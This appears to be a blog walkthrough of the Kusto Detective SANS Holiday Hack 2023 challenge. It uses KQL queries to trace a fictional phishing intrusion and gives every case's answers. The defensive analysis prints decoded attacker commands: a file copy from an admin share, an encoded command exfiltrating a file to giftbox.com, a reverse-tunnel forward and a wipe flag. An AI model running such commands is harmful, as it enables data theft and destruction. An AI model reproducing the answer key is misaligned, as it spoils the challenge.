top of page
Writer's pictureAniket RT

Kusto Detective - SANS Holiday 2023

You can download the solution set from the below link or follow along the article.


Onboarding - Welcome to SANS Holiday Hack 2023!

Make sure you create a cluster and run the scripts given to create tables and the required functions.


For more information, you can check the FAQs at


Now, this is very easy. The following query should give you the desired output.


Employees

| where hostname contains 'laptop' and role =~ 'craftsperson elf'

| distinct username

| count

 

Question - How many Craftperson Elf's are working from laptops?


Answer – 25


Case 1 Welcome to Operation Giftwrap: Defending the Geese Island network


The first question is What is the email address of the employee who received this phishing email?


This particular problem does give us a link that the attacker had used namely 'http://madelvesnorthpole.org/published/search/MonthlyInvoiceForReindeerFood.docx'


I checked in SecurityAlerts table but could not find anything.


Hence, I turned my attention over to another table which lists down outbound network connections along with Source IP and following is the query.


OutboundNetworkEvents


Running this query gives us the source ip that is 10.10.0.4


We do know that we have a table “Employees” that is used to store employee details such as hostname, username, email address, domain name and so on.


Let us use the source ip to find our employee.

Employees

| where ip_addr == '10.10.0.4'

 

We can also use another approach that is querying the Email table using the following query.

Email

 

The above query will give us the answer to all the questions.


Q1 - What is the email address of the employee who received this phishing email?


Q2- What is the email address that was used to send this spear phishing email?


Q3 - What was the subject line used in the spear phishing email?

Ans - [EXTERNAL] Invoice foir reindeer food past due


Case 2 Someone got phished! Let's dig deeper on the victim...


All the details can be fetched from Employee table.


Following is the query –


Employees

| project role, hostname, ip_addr

 

Q1- What is the role of our victim in the organization?

Ans- Head Elf


Q2- What is the hostname of the victim's machine?

Ans- Y1US-DESKTOP


Q3- What is the source IP linked to the victim?

Ans- 10.10.0.4


Case 3 That's not good. What happened next?


Q1 - What time did Alabaster click on the malicious link? Make sure to copy the exact timestamp from the logs!


Query-

OutboundNetworkEvents

| project timestamp

 

Answer- 2023-12-02T10:12:42Z


Q2- What file is dropped to Alabaster's machine shortly after he downloads the malicious file?


Ans- We can run the following query to check for file creation events using hostname that we had extracted earlier.


FileCreationEvents

| where hostname == 'Y1US-DESKTOP' //'2023-12-02T10:12:42Z'

| sort by timestamp asc

 

Now, we need to look for all events that happened on 02/12/2023 on and after 10:12


We get the following two results.



The answer is giftwrap.exe


Case 4 A compromised host! Time for a deep dive.


Q1- The attacker created an reverse tunnel connection with the compromised machine. What IP was the connection forwarded to?


Ans- Here, the clue is “ip forwarded to”, let us have a look at the table ProcessEvents and look for string containing forward. We already have the victims hostname so let us utilize that to our advantage.

 

ProcessEvents

| where hostname == 'Y1US-DESKTOP' and process_commandline contains ''forward'

 

Following is the output.


The answer is 113.37.9.17


Q2- What is the timestamp when the attackers enumerated network shares on the machine?


Ans- Clue is in the question itself, let us query the same table to look for the string “share”


ProcessEvents

| where hostname == 'Y1US-DESKTOP' and process_commandline contains 'share'

 


The answer is 2023-12-02T16:51:44Z


Q3- What was the hostname of the system the attacker moved laterally to?


Now, that we have the parent process hash, let’s use that to find the answer.


ProcessEvents

| where hostname == 'Y1US-DESKTOP' and parent_process_hash =~ '614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f'

 

We get a few records and in one of them, we can notice that a network share location was accessed.


The answer is NorthPolefileshare


Case 5 A hidden message

For this case, please make sure that you hit the “Train me for this case” button as it gives a good explanation of base64 encoding and decoding using kql functions.


Without, further ado let us dive into the questions.


Q1- When was the attacker's first base64 encoded PowerShell command executed on Alabaster's machine?


Ans- We can use the following query to give us the command that was executed on the victims machine. The clue here is “powershell”


ProcessEvents

| where hostname == 'Y1US-DESKTOP' and parent_process_hash =~ '614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f'

| where process_commandline contains 'powershell.exe'

| sort by timestamp asc

 


Answer is 2023-12-24T16:07:47Z


Q2- What was the name of the file the attacker copied from the fileshare? (This might require some additional decoding)



Decoding the string using the following query, we get the following output.

print(base64_decode_tostring("KCAndHh0LnRzaUxlY2lOeXRoZ3VhTlxwb3Rrc2VEXDpDIHR4dC50c2lMZWNpTnl0aGd1YU5cbGFjaXRpckNub2lzc2lNXCRjXGVyYWhzZWxpZmVsb1BodHJvTlxcIG1ldEkteXBvQyBjLSBleGUubGxlaHNyZXdvcCcgLXNwbGl0ICcnIHwgJXskX1swXX0pIC1qb2luICcn"))

 

Output

( 'txt.tsiLeciNythguaN\potkseD\:C txt.tsiLeciNythguaN\lacitirCnoissiM\$c\erahselifeloPhtroN\\ metI-ypoC c- exe.llehsrewop' -split '' | %{$_[0]}) -join ''


Notice that the string is in reverse, let us get it back in order.


You can use any reverse string online webpage to do the work for you.


'' nioj- )}]0[_${% | '' tilps- 'powershell.exe -c Copy-Item \\NorthPolefileshare\c$\MissionCritical\NaughtyNiceList.txt C:\Desktop\NaughtyNiceList.txt' (


Looking at the above output, we have our answer that is NaughtyNiceList.txt


Q3- The attacker has likely exfiltrated data from the file share. What domain name was the data exfiltrated to?


Ans- Let us run the same query again and decode string from the second and third output.


ProcessEvents

| where hostname == 'Y1US-DESKTOP' and parent_process_hash =~ '614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f'

| where process_commandline contains 'powershell.exe'

| sort by timestamp asc

 

Decoding the second string, we get an output.

print(base64_decode_tostring("W1N0UmlOZ106OkpvSW4oICcnLCBbQ2hhUltdXSgxMDAsIDExMSwgMTE5LCAxMTAsIDExOSwgMTA1LCAxMTYsIDEwNCwgMTE1LCA5NywgMTEwLCAxMTYsIDk3LCA0NiwgMTAxLCAxMjAsIDEwMSwgMzIsIDQ1LCAxMDEsIDEyMCwgMTAyLCAxMDUsIDEwOCwgMzIsIDY3LCA1OCwgOTIsIDkyLCA2OCwgMTAxLCAxMTUsIDEwNywgMTE2LCAxMTEsIDExMiwgOTIsIDkyLCA3OCwgOTcsIDExNywgMTAzLCAxMDQsIDExNiwgNzgsIDEwNSwgOTksIDEwMSwgNzYsIDEwNSwgMTE1LCAxMTYsIDQ2LCAxMDAsIDExMSwgOTksIDEyMCwgMzIsIDkyLCA5MiwgMTAzLCAxMDUsIDEwMiwgMTE2LCA5OCwgMTExLCAxMjAsIDQ2LCA5OSwgMTExLCAxMDksIDkyLCAxMDIsIDEwNSwgMTA4LCAxMDEpKXwmICgoZ3YgJypNRHIqJykuTmFtRVszLDExLDJdLWpvaU4="))

 


We can see the output is a join of lots of numbers. I copied the entire number array into excel and replace all commas with blank space. I then went to a decimal to ascii convertor online and inserted the number array as can be seen below.


This gives us our answer that is giftbox.com


Case 6 - The final step!


Q1- What is the name of the executable the attackers used in the final malicious command?


Ans- Rather than going back and forth to decode the base64 strings, let us leverage the parse operator to decode and get the output in the same query itself.


ProcessEvents

| where hostname == 'Y1US-DESKTOP' and parent_process_hash =~ '614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f' and process_commandline contains '-enc'

| parse-where process_commandline with @'C:\Windows\System32\powershell.exe -Nop -ExecutionPolicy bypass -enc ' base64string

| extend DecodedBase64 = base64_decode_tostring(base64string)

| project timestamp, parent_process_name, DecodedBase64



Looking at the last output, we can see the name of the executable that is downwithsanta.exe


Q2- What was the command line flag used alongside this executable?

Using the same query as above, the parameter used alongside this executable command is

–wipeall

 

Congratulations, that is it! You can do the last one to get the decoded base64 string that is

 


77 views0 comments

Recent Posts

See All

Comments


bottom of page